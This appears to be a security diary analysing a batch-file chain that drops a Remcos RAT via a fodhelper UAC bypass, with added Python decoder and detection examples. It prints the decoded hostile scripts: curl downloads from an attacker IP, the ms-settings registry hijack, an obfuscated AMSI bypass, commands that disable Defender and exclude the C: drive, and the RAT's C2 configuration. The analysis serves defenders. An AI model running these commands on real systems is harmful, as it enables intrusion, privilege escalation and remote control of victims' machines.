RAT Delivered Through FODHelper

Published: 2022-09-22
Last Updated: 2022-09-22 07:11:21 UTC
by Xavier Mertens (Version: 1)

I found a simple batch file that drops a Remcos[1] RAT through an old UAC bypass technique based on the "fodhelper" utility ("Features On Demand Helper"). fodhelper.exe is a Microsoft-signed binary that auto-elevates: once launched, it looks for specific registry keys under the current user's hive and, if they exist, executes their content with high privileges, without any UAC prompt.

The script, called "2.bat", is very simple. Note that, when opened in a text editor, it displays Chinese characters because of the BOM (Byte Order Mark) at the start of the file:

remnux@remnux:/MalwareZoo/20220919$ xxd 2.bat 
00000000: fffe 2663 6c73 0d0a 4065 6368 6f20 6f66  ..&cls..@echo of
00000010: 6620 0d0a 5469 746c 6520 257e 6e30 0d0a  f ..Title %~n0..
00000020: 4d6f 6465 2036 302c 3320 0d0a 636f 6c6f  Mode 60,3 ..colo
00000030: 7220 3042 0d0a 6563 686f 280d 0a65 6368  r 0B..echo(..ech
00000040: 6f20 2020 2020 2020 2020 506c 6561 7365  o         Please
00000050: 2077 6169 742e 2e2e 2061 2077 6869 6c65   wait... a while
00000060: 204c 6f61 6469 6e67 2064 6174 6120 2e2e   Loading data ..
00000070: 2e2e 0d0a 4345 5254 5554 494c 202d 6620  ....CERTUTIL -f 

Here is the decoded script:

cls
@echo off 
Title %~n0
Mode 60,3 
color 0B
echo(
echo         Please wait... a while Loading data ....
CERTUTIL -f -decode "%~f0" "%Temp%\2.bat" >nul 2>&1 
cls
"%Temp%\2.bat"
Exit
-----BEGIN CERTIFICATE-----
[Base64 blob omitted]
-----END CERTIFICATE-----

certutil.exe (a common LOLBin) decodes the Base64 data embedded in the file itself, writes a new batch file to %Temp% and launches it. This works because "%~f0" expands to the full path of the running batch file, so certutil reads the script as its own input and ignores everything outside the certificate header and footer. Here is the decoded bat file:

@echo off
echo Please wait 30 seconds: we're bypassing the AuthID(HWID). This tray will autoclose once finished.
curl.exe -s --output %USERPROFILE%\Links\puedo.ps1 --url hxxp://171[.]22[.]30[.]120/puedo.ps1
timeout 5 > nul
curl.exe -s --output %USERPROFILE%\Links\adhd.bat --url hxxp://171[.]22[.]30[.]120/adhd.bat
timeout 5 > nul
curl.exe -s --output %USERPROFILE%\Links\net.vbs --url hxxp://171[.]22[.]30[.]120/net.vbs
timeout 5 > nul
powershell New-Item -Path HKCU:\Software\Classes\ms-settings\shell\open\command -Value %USERPROFILE%\Links\adhd.bat -Force
powershell New-ItemProperty -Path HKCU:\Software\Classes\ms-settings\shell\open\command -Name DelegateExecute -PropertyType String -Force
fodhelper
exit
Del %~0 

Once fodhelper is launched, it will execute adhd.bat, which uses the same technique:

cls
@echo off
Title %~n0
Mode 60,3
color 0B
echo(
echo         Please wait... a while Loading data ....
CERTUTIL -f -decode "%~f0" "%Temp%\adhd - Copia.bat" >nul 2>&1
cls
"%Temp%\adhd - Copia.bat"
Exit
-----BEGIN CERTIFICATE-----
QGVjaG8gb2ZmDQplY2hvIEFsbW9zdCBmaW5pc2hlZDogaXQgd2lsbCBhdXRvcnVu
cyBpbiBsZXNzIHRoYW4gMTUgc2Vjb25kcyENCmNkICVVU0VSUFJPRklMRSVcTGlu
a3NcDQpQb3dlclNoZWxsIC1FeGVjdXRpb25Qb2xpY3kgQnlwYXNzIC1GaWxlICJw
dWVkby5wczEiDQplY2hvIEFsbW9zdCBmaW5pc2hlZDogaXQgd2lsbCBhdXRvcnVu
cyBpbiBsZXNzIHRoYW4gMTUgc2Vjb25kcyENCnRpbWVvdXQgMTAgPiBudWwNCnN0
YXJ0IG5ldC52YnMNCmV4aXQNCg0KDQpEZWwgJX4wIA0KDQpEZWwgJX4wIA0K
-----END CERTIFICATE-----

The decoded Base64 contains:

@echo off
echo Almost finished: it will autoruns in less than 15 seconds!
cd %USERPROFILE%\Links\
PowerShell -ExecutionPolicy Bypass -File "puedo.ps1"
echo Almost finished: it will autoruns in less than 15 seconds!
timeout 10 > nul
start net.vbs
exit
Del %~0 
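
Both 2.bat and adhd.bat rely on certutil reading their own file and decoding only the Base64 between the certificate header and footer. The helper below is an added analysis example, not the author's tooling: it reproduces that step in Python on a constructed copy of adhd.bat whose Base64 block is the one shown above, and it works on raw bytes because the leading ff fe BOM is not followed by real UTF-16 text.

```python
import base64
import re

# Constructed sample modelled on adhd.bat as shown in the diary: a 0xFFFE BOM,
# plain-ASCII batch lines, then the Base64 block. Only the Base64 lines are
# copied from the page; the batch lines are a shortened reconstruction.
SAMPLE_BAT = (
    b"\xff\xfe&cls\r\n@echo off\r\nTitle %~n0\r\n"
    b"CERTUTIL -f -decode \"%~f0\" \"%Temp%\\adhd - Copia.bat\" >nul 2>&1\r\n"
    b"cls\r\n\"%Temp%\\adhd - Copia.bat\"\r\nExit\r\n"
    b"-----BEGIN CERTIFICATE-----\r\n"
    b"QGVjaG8gb2ZmDQplY2hvIEFsbW9zdCBmaW5pc2hlZDogaXQgd2lsbCBhdXRvcnVu\r\n"
    b"cyBpbiBsZXNzIHRoYW4gMTUgc2Vjb25kcyENCmNkICVVU0VSUFJPRklMRSVcTGlu\r\n"
    b"a3NcDQpQb3dlclNoZWxsIC1FeGVjdXRpb25Qb2xpY3kgQnlwYXNzIC1GaWxlICJw\r\n"
    b"dWVkby5wczEiDQplY2hvIEFsbW9zdCBmaW5pc2hlZDogaXQgd2lsbCBhdXRvcnVu\r\n"
    b"cyBpbiBsZXNzIHRoYW4gMTUgc2Vjb25kcyENCnRpbWVvdXQgMTAgPiBudWwNCnN0\r\n"
    b"YXJ0IG5ldC52YnMNCmV4aXQNCg0KDQpEZWwgJX4wIA0KDQpEZWwgJX4wIA0K\r\n"
    b"-----END CERTIFICATE-----\r\n"
)

PEM_BLOCK = re.compile(
    rb"-----BEGIN CERTIFICATE-----\s*(.*?)\s*-----END CERTIFICATE-----", re.S)


def has_bom_prefix(data: bytes) -> bool:
    """True when the file starts with the ff fe marker seen in the xxd dump."""
    return data.startswith(b"\xff\xfe")


def extract_certutil_payload(data: bytes) -> bytes:
    """Mimic 'certutil -decode' on a self-decoding batch file.

    Works on raw bytes on purpose: the file starts with a UTF-16 BOM but the
    rest is 8-bit ASCII, so decoding it as UTF-16 would garble every line
    (which is why an editor shows CJK glyphs). As the diary shows, certutil
    skips the batch code above the block and only decodes the PEM body.
    """
    if has_bom_prefix(data):
        data = data[2:]
    m = PEM_BLOCK.search(data)
    if not m:
        raise ValueError("no BEGIN/END CERTIFICATE block found")
    b64 = re.sub(rb"\s+", b"", m.group(1))  # certutil tolerates line wraps
    return base64.b64decode(b64, validate=True)


if __name__ == "__main__":
    print(extract_certutil_payload(SAMPLE_BAT).decode("ascii"))
```

Running it prints the second-stage batch script; note that the decoded bytes contain two "Del %~0" lines, one more than the listing above shows.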

The PowerShell script "puedo.ps1" is responsible for downloading and executing the malware:

sET-ItEM ( 'V'+'aR' + 'IA' + 'blE:1q2' + 'uZx' ) ( [TYpE]( "{1}{0}"-F'F','rE' ) ) ; ( GeT-VariaBle ( "1Q2U" +"zX" ) -VaL )."A`ss`Embly"."GET`TY`Pe"(( "{6}{3}{1}{4}{2}{0}{5}" -f'Util','A','Amsi','.Management.','utomation.','s','System' ) )."g`etf`iElD"( ( "{0}{2}{1}" -f'amsi','d','InitFaile' ),( "{2}{4}{0}{1}{3}" -f 'Stat','i','NonPubli','c','c,' ))."sE`T`VaLUE"( ${n`ULl},${t`RuE} )
Set-MpPreference -DisableRealtimeMonitoring $trUE
Set-MpPreference -DisableIOAVProtection $trUE
powershell -inputformat none -outputformat none -NonInteractive -Command Add-MpPreference -ExclusionPath "C:"
powershell -inputformat none -outputformat none -NonInteractive -Command Add-MpPreference -ExclusionPath "C:\"
curl.exe -s --output ("photoscreen\$env:USERNAME\Links\Zu@E.jpeg".Replace('photo','C:\').Replace('screen','Users\').Replace('Zu@E','\zoey').Replace('jpeg','exe')) --url ("colibri://google/Papero.exe".Replace('colibri','http').Replace('google','171[.]22[.]30[.]120'))
cd C:\Users\$env:USERNAME\Links
.\zoey.exe
exit

Note that the script first neuters AMSI (the reflection call sets the non-public amsiInitFailed field of System.Management.Automation.AmsiUtils to true; the string concatenation and format operators only hide the class and field names from simple keyword matching), then disables Microsoft Defender real-time and IOAV protection and excludes the whole C: drive from scanning. The malware is a Remcos RAT (SHA256:6e83574ed73d798183a1555a910dcc118ac05cf1eac77306ab6edfdcab9207c3) with the following config:

{
    "c2": [
        "171[.]22[.]30[.]7:5578"
    ],
    "attr": {
        "mutex": "asf4fas8sf48asf84as4f89huhhu99h9h-V446WS",
        "copy_file": "Isass.exe",
        "hide_file": false,
        "copy_folder": "Microsoft Updater",
        "delete_file": false,
        "keylog_file": "logs.dat",
        "keylog_flag": false,
        "audio_folder": "MicRecords",
        "install_flag": true,
        "install_path": "%ProgramFiles%",
        "keylog_crypt": false,
        "mouse_option": false,
        "connect_delay": "0",
        "keylog_folder": "remcos",
        "startup_value": "Windows Host Controller",
        "screenshot_flag": false,
        "screenshot_path": "%AppData%",
        "screenshot_time": "10",
        "connect_interval": "1",
        "hide_keylog_file": false,
        "screenshot_crypt": false,
        "audio_record_time": "5",
        "screenshot_folder": "Screenshots",
        "take_screenshot_time": "5",
        "take_screenshot_option": false
    },
    "rule": "Remcos",
    "botnet": "Papero",
    "family": "remcos"
}
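
For defenders, the chain above leaves the same footprints on every host: certutil run with -decode, a write under HKCU ...\Classes\ms-settings\shell\open\command, fodhelper.exe with a command interpreter as its child, and Set-MpPreference/Add-MpPreference tampering. The script below is an added example (not from the diary) that runs those four checks over constructed Sysmon-style process-creation (ID 1) and registry (ID 13) events; field names, paths and the SID are assumptions.

```python
import re

# Constructed Sysmon-style events (not real telemetry), modelled on the chain
# in this diary. Paths and the SID are placeholders.
SAMPLE_EVENTS = [
    {"id": 1, "image": "certutil.exe", "parent": "cmd.exe",
     "cmdline": 'CERTUTIL -f -decode "C:\\Users\\u\\2.bat" "C:\\Users\\u\\AppData\\Local\\Temp\\2.bat"'},
    {"id": 13, "image": "powershell.exe",
     "target": "HKU\\S-1-5-21-0-0-0-1001\\Software\\Classes\\ms-settings\\shell\\open\\command\\DelegateExecute"},
    {"id": 1, "image": "fodhelper.exe", "parent": "cmd.exe", "cmdline": "fodhelper"},
    {"id": 1, "image": "cmd.exe", "parent": "fodhelper.exe",
     "cmdline": 'cmd.exe /c "C:\\Users\\u\\Links\\adhd.bat"'},
    {"id": 1, "image": "powershell.exe", "parent": "cmd.exe",
     "cmdline": "powershell -NonInteractive -Command Add-MpPreference -ExclusionPath C:\\"},
    {"id": 1, "image": "notepad.exe", "parent": "explorer.exe", "cmdline": "notepad.exe"},  # benign
]

# One predicate per stage; each is usable alone as a hunting query and
# together they reconstruct the sequence seen in the diary.
RULES = {
    "certutil_decode": lambda e: e["id"] == 1 and e["image"].lower() == "certutil.exe"
        and re.search(r"(?i)(^|\s)-decode(\s|$)", e.get("cmdline", "")) is not None,
    "ms_settings_handler_write": lambda e: e["id"] == 13 and re.search(
        r"(?i)\\software\\classes\\ms-settings\\shell\\open\\command", e.get("target", "")) is not None,
    # fodhelper.exe normally spawns no shell; a cmd/powershell child is the bypass firing.
    "fodhelper_child": lambda e: e["id"] == 1 and e.get("parent", "").lower() == "fodhelper.exe",
    "defender_tamper": lambda e: e["id"] == 1 and re.search(
        r"(?i)(Set-MpPreference\s+-Disable\w+|Add-MpPreference\s+-ExclusionPath)", e.get("cmdline", "")) is not None,
}


def match_event(event):
    """Names of the rules a single event trips (empty list for benign events)."""
    return [name for name, pred in RULES.items() if pred(event)]


def triage(events):
    """Map each rule to the indexes of the events that tripped it."""
    hits = {name: [] for name in RULES}
    for i, e in enumerate(events):
        for name in match_event(e):
            hits[name].append(i)
    return hits


def chain_score(events):
    """Distinct stages seen on one host; several in a short window turn noisy
    single signals (certutil, a registry write) into a UAC-bypass finding."""
    return sum(1 for idxs in triage(events).values() if idxs)


if __name__ == "__main__":
    print(triage(SAMPLE_EVENTS), "score:", chain_score(SAMPLE_EVENTS))
```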

[1] https://malpedia.caad.fkie.fraunhofer.de/details/win.remcos

Xavier Mertens (@xme)
Xameco
Senior ISC Handler - Freelance Cyber Security Consultant